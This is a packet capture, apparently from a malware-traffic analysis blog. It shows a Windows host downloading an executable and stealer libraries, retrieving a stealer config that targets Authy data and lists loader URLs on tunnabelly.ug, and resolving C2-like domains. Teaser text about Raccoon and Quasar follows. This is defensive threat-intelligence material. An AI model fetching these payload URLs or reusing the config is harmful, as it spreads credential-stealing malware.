2020-06-23 15:26:21.518710 IP 10.1.10.15.49742 > 217.8.117.45.80: Flags [P.], seq 1:502, ack 1, win 16425, length 501: HTTP: GET /zxcv.EXE HTTP/1.1
E….=@…wX
.
…u-.N.P’&”i….P.@).Q..GET /zxcv.EXE HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Range: bytes=90210-
Unless-Modified-Since: Sat, 20 Jun 2020 15:23:12 GMT
If-Range: “177000-5a8859680d070”
Host: jamshed.pk
Connection: Keep-Alive
2020-06-23 15:26:21.594726 IP 10.1.10.15.49724 > 64.31.23.18.80: Flags [.], ack 50, win 16363, length 0
E..(.>@…pQ
.
.@….<.P..fx..c.P.?………..
2020-06-23 15:26:21.673543 IP 217.8.117.45.80 > 10.1.10.15.49742: Flags [.], ack 502, win 237, length 0
E..(..@.*.]…u-
.
..P.N….’&$^P…]………
2020-06-23 15:26:21.726642 IP 217.8.117.45.80 > 10.1.10.15.49742: Flags [.], seq 1:1461, ack 502, win 237, length 1460: HTTP: HTTP/1.1 206 Partial Content
E…..@.*.WP..u-
.
..P.N….’&$^P…….HTTP/1.1 206 Partial Content
Date: Tue, 23 Jun 2020 19:29:13 GMT
Server: Apache/2.4.10 (Debian)
Last-Modified: Sat, 20 Jun 2020 15:23:12 GMT
ETag: “177000-5a8859680d070”
Accept-Ranges: bytes
Content-Length: 1445790
Content-Range: bytes 90210-1535999/1536000
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
..P.P…..]..P…….%APPDATA%\\Microsoft\\Windows\\Recent”,”mask”:”*”,”size_limit”:500,”exceptions”:”\\Windows\\\n\\Program Files\\\n\\Program Files (x86)\\\n\\AppData\\Local\\\n\\AppData\\LocalLow\\\n\\AppData\\Roaming\\\n\\ProgramData\\\n\\TEMP\\\n\\PUBLIC\\\n\\System32\\\n\\Keygen\\\n\\Crack\\\n\\Patch\\\n\\Games\\\n\\Game\\\n\\Music\\\n\\Movies\\\n\\Mp3\\\n\\Adobe\\\n\\xampp\\\n\\SteamGames\\\n\\steamapps\\”,”shortcuts”:[“true”]},{“name”:”Authy”,”path”:”%userprofile%\\AppData\\Roaming\\Authy Desktop\\Local Storage\\leveldb”,”size_limit”:2000,”subfolders”:[“true”],”mask”:”*”}],”loader_urls”:null},”lu”:[{“u”:”http://tunnabelly.ug/nw.exe”,”t”:0},{“u”:”http://tunnabelly.ug/ac.exe”,”t”:0},{“u”:”http://tunnabelly.ug/ds1.exe”,”t”:0},{“u”:”http://tunnabelly.ug/ds2.exe”,”t”:0}],”rm”:1,”is_screen_enabled”:1,”is_history_enabled”:1,”depth”:3}
2020-06-23 15:26:37.126576 IP 10.1.10.15.49745 > 34.105.129.68.80: Flags [P.], seq 1:269, ack 1, win 16685, length 268: HTTP: GET /gate/sqlite3.dll HTTP/1.1
E..4!.@… w
.
.”i.D.Q.P..z.E…P.A-.I..GET /gate/sqlite3.dll HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: 34.105.129.68
Connection: Keep-Alive
2020-06-23 15:26:37.217333 IP 34.105.129.68.80 > 10.1.10.15.49745: Flags [.], ack 269, win 509, length 0
E..(.C@.8…”i.D
.
..P.QE…..{.P…< ……..
2020-06-23 15:26:37.241515 IP 10.1.10.15.49744 > 34.105.129.68.80: Flags [.], ack 2254, win 16683, length 0
E..(!.@…!.
.
.”i.D.P.P.]…. .P.A+.y……..
2020-06-23 15:26:37.284456 IP 34.105.129.68.80 > 10.1.10.15.49745: Flags [.], seq 1:1421, ack 269, win 509, length 1420: HTTP: HTTP/1.1 200 OK
E….D@.8..B”i.D
.
..P.QE…..{.P…….HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 23 Jun 2020 19:29:28 GMT
Content-Type: application/octet-stream
Content-Length: 916735
Connection: keep-alive
Last-Modified: Mon, 18 Mar 2019 19:52:10 GMT
ETag: “5c8ff6ea-dfcff”
Accept-Ranges: bytes
MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..
.
.
……:… ………. FCFJDEFHEOCNDHCNENEBEMFHEBFCEFBM.. ..
2020-06-23 15:26:42.537156 IP 10.1.10.15.49745 > 34.105.129.68.80: Flags [P.], seq 269:534, ack 917003, win 65320, length 265: HTTP: GET /gate/libs.zip HTTP/1.1
E..1,.@….R
.
.”i.D.Q.P..{.F…P..(.`..GET /gate/libs.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: 34.105.129.68
Connection: Keep-Alive
2020-06-23 15:26:42.629434 IP 34.105.129.68.80 > 10.1.10.15.49745: Flags [.], ack 534, win 507, length 0
E..(..@.8..F”i.D
.
..P.QF…..|.P…=………
2020-06-23 15:26:42.698331 IP 34.105.129.68.80 > 10.1.10.15.49745: Flags [.], seq 917003:918423, ack 534, win 507, length 1420: HTTP: HTTP/1.1 200 OK
E…..@.8…”i.D
.
..P.QF…..|.P…….HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 23 Jun 2020 19:29:34 GMT
Content-Type: application/zip
Content-Length: 2828315
Connection: keep-alive
Last-Modified: Wed, 03 Apr 2019 07:47:18 GMT
ETag: “5ca46506-2b281b”
2020-06-23 15:26:56.819403 IP 10.1.10.15.61623 > 75.75.75.75.53: 32813+ A? tunnabelly.ug. (31)
E..;:…..U.
.
.KKKK…5.’5_.-……….
tunnabelly.ug…..
2020-06-23 15:26:57.044841 IP 75.75.75.75.53 > 10.1.10.15.61623: 32813 1/0/0 A 217.8.117.45 (47)
E..K..@.9…KKKK
.
..5…7…-……….
tunnabelly.ug…………..X….u-
2020-06-23 15:26:57.045514 IP 10.1.10.15.62114 > 75.75.75.75.53: 57616+ AAAA? tunnabelly.ug. (31)
E..;:…..U.
.
.KKKK…5.’…………..
tunnabelly.ug…..
2020-06-23 15:26:57.286870 IP 75.75.75.75.53 > 10.1.10.15.62114: 57616 0/1/0 (91)
E..w..@.9…KKKK
.
..5…c…………..
tunnabelly.ug…………….0.a.dnspod.com..domainadmin.-^..o……….u…..
2020-06-23 15:27:07.278977 IP 10.1.10.15.54896 > 75.75.75.75.53: 54842+ A? thompson.ug. (29)
E..9<…..S.
.
.KKKK.p.5.%o..:………..thompson.ug…..
2020-06-23 15:27:07.514741 IP 75.75.75.75.53 > 10.1.10.15.54896: 54842 1/0/0 A 194.5.97.49 (45)
E..I..@.9…KKKK
.
..5.p.5Mh.:………..thompson.ug…………..X….a1
2020-06-23 15:28:23.855105 IP 10.1.10.15.53544 > 75.75.75.75.53: 51196+ A? vbchjfssdfcxbcver.ru. (38)
E..B<@….S.
.
.KKKK.(.5…Q………….vbchjfssdfcxbcver.ru…..
2020-06-23 15:28:23.949102 IP 75.75.75.75.53 > 10.1.10.15.53544: 51196 NXDomain 0/1/0 (99)
E…..@.9…KKKK
.
..5.(.k……………vbchjfssdfcxbcver.ru…………….1.a.dns.ripn.net.
hostmaster.8.=.=..Q…8@.’……
Written By
AZORult/RacoonStealer can steal banking information including passwords and credit card details as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat. Raccoon is an info stealer type malware available as a Malware as a Service. It can be obtained for a subscription and costs $200 per month. Raccoon malw...
Quasar is a very popular RAT in the world thanks to its code being available in the open-source. This malware can be used to remotely control the victim’s computer. 4.exe is the dropper for the banking trojan and Quasar is the GET /line ip-api.com traffic...
020-06-03 06:14:07.168233 IP 10.1.10.15.49510 > 191.234.186.189.80: Flags [P.], seq 1:432, ack 1, win 16560, length 431: HTTP: GET /kkkkkkk/ HTTP/1.1 E.....@...P. . ......f.P\.m...a.P.@.f}..GET /kkkkkkk/ HTTP/1.1 Accept: image/jpeg, application/x-ms-...
2019-08-26 15:03:01.209093 IP 10.8.26.101.51807 > 10.8.26.1.53: 44756+ A? mysocalledchaos.com. (37) E..A.O…… ..e …._.5.-……………mysocalledchaos.com….. 2019-08-26 15:03:01.353045 IP 10.8.26.101.49163 > 166.62.111.64.80: Flags [P.], seq 1:409, ack 1...
